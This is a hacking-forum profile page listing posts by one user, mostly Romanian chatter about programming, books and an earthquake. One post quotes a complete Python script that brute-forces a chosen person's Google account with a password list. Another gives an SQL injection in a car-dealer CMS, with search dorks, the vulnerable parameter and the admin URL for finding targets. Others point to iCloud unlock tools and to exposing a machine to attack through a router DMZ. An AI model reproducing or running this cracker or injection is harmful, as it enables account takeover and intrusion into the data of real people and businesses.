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Everything posted by cehov

  1. trebuie sa folosesti multiplex
  2. incepe cu scripturile mai intai, cauta pe rand pe google: hello world batch hello world vbs hello world vb6 etc... si pe urma pe youtube tot la fel sau intercalat google/youtube si cand nu stai la pc iti recomand sa gasesti o carte despre arhitectura procesoarelor si comenziile lor, limbaje de programare
  3. cehov

    Yahoo XSS

    voi chiar nu munciti #1488 si pierdeti timpul aici? mai sunt si alte forumuri pe tema asta in afara de acest forum? intreb doar ca sa stiu ce concurenta este ca subiectele de cacat nu apar din intamplare sunt directionate catre acest forum, si daca public un 0-day in google, facebook sau apple sa stiu la ce sa ma astept din partea concurentei
  4. Am reluat citirea volumelor Solaris reprezinta cred urmatorii 150 de ani ai omenirii Cartea nu se compara cu filmele, potentialul ei nu a fost exploatat la maxim in cinematografie.
  5. LooL where is the exploit ? #!usr/bin/python #Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall ! #This program is for educational purposes only. #Don't attack people facebook accounts it's illegal ! #If you want to crack into someone's account, you must have the permission of the user. #Mauritania Attacker is not responsible. import sys import random import mechanize import cookielib GHT = ''' +=======================================+ |..........Google Cracker v 1...........| |.....Based on Facebook Cracker v 2.....| +---------------------------------------+ |#Original Author: Mauritania Attacker | |#Contact: www.fb.com/mauritanie.forever| |#Modified by: No Network Organization | |#Date: 02/04/2013 | |#Modification date: 25/01/2015 | |#This tool is made for pentesting. | |#Changing the Description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Google Cracker v 1...........| |.....Based on Facebook Cracker v 2.....| +---------------------------------------+ ''' print "Note: - This tool can crack google account" print "# Hit CTRL+C to quit the program" #print "# Use www.graph.facebook.com for more infos about your victim ^_^" email = str(raw_input("# Enter Google Email or Gooogle Username : ")) passwordlist = str(raw_input("Enter the name of the password list file : ")) useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] login = 'https://accounts.google.com/ServiceLoginAuth' def attack(password): try: sys.stdout.write("\r[*] trying %s.. " % password) sys.stdout.flush() br.addheaders = [('User-agent', random.choice(useragents))] site = br.open(login) br.select_form(nr=0) ##Google br.form['Email'] =email br.form['Passwd'] = password br.submit() log = br.geturl() if log != login: print "\n\n\n [*] Password found .. !!" print "\n [*] Password : %s\n" % (password) sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program .. " sys.exit(1) def search(): global password for password in passwords: attack(password.replace("\n","")) def check(): global br global passwords try: br = mechanize.Browser() cj = cookielib.LWPCookieJar() br.set_handle_robots(False) br.set_handle_equiv(True) br.set_handle_referer(True) br.set_handle_redirect(True) br.set_cookiejar(cj) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) except KeyboardInterrupt: print "\n[*] Exiting program ..\n" sys.exit(1) try: list = open(passwordlist, "r") passwords = list.readlines() k = 0 while k < len(passwords): passwords[k] = passwords[k].strip() k += 1 except IOError: print "\n [*] Error: check your password list path \n" sys.exit(1) except KeyboardInterrupt: print "\n [*] Exiting program ..\n" sys.exit(1) try: print GHT print " [*] Account to crack : %s" % (email) print " [*] Loaded :" , len(passwords), "passwords" print " [*] Cracking, please wait ..." except KeyboardInterrupt: print "\n [*] Exiting program ..\n" sys.exit(1) try: search() attack(password) except KeyboardInterrupt: print "\n [*] Exiting program ..\n" sys.exit(1) if __name__ == '__main__': check()
  6. Lucram de ceva timp la o firma de programare din afara si acum am plecat de acolo. Am ramas conform contractului cu o reducere de 30% suportata de companie daca achizitionez orice soft sau licenta. Momentan mi-am luat ce aveam nevoie si mai pot achizitiona 4 programe sau licente. Daca va intereseaza reducerea PM.
  7. Dealer Express Auto Sales CMS SQLi by #cehov RST Platform: Web App Sellers of CMS: http://www.dealerexpress.net/page.php Type: Sql injection, privilege escalation Admin url: http://www.domain.com/CarDealer/admin/ Date of begin: 24 feb 2015 Dork 1: "powered by dealer express" Dork 2: "result.php?makeid=" Example: http://www.domain.com/cardealer/results.php?makeid=55 http://www.domain.com/CarDealer/results.php?makeid=8 The makeid is not the only, there are multiple vuln. in this auto cms. Have fun RST.
  8. DigitalWORLD.ro - Priza programabila cu temporizator mecanic, TIMER asta in caz ca nu vrei la baie noaptea si trebuie sa "sucesti" priza din nou pe intuneric
  9. a primit cineva metoda?
  10. A fost cutremur marisor dar scurt...a-ti simtit? poate se pricepe cineva sa calculeze magnitudinea dupa liniile alea din poza... infp.ro mort mobotix muntele rosu mort fotonsas.ro mort :)) noroc ca am putut sa fac printscreen-ul
  11. Daca aveai masca lui Constantine la tine se speria moartea, lasand gluma, pentru un telefon nu merita sa il bagi la parnaie intelegete cu el, unul drogat iti lua tel si baga si brisca in tine, ce faci acum iti defineste viata mai incolo.
  12. cehov

    Icloud 5s

    vezi ca era un exploit pe forum pe aici contacteaza-l pe cel care a postat
  13. am gasit si eu acest script la ziua izabelei si de atunci mi-a schimbat viata !
  14. spn.exe ce este? pune scriptul nu executabil....
  15. cei care au adus ani la rand aport asupra acestei comunitati merita amaratul tau de steam care poate este si "speriat"...mananca-ti guma de 5 euro sau da delete la cont!
  16. e mai simplu cu doulci https://www.google.com/#q=unlock+icloud
  17. cehov

    Icloud 5s

    vezi doulci https://www.google.com/#q=unlock+icloud
  18. englezii au spus ca este posibil sa fie interzis in anglia deoarece nu se poate intercepta. eu cred invers ca incearca sa faca la fel ca si cu facebook. cine stie doar nu e opens nu?...
  19. you can set a dmz host on the target machine internal ip (from dhcp status) make it vulnerable behind router internal network an then attack this machine. "wake on lan" become "wake on internet network" all the tcp and udp victim ports will become available, and more...
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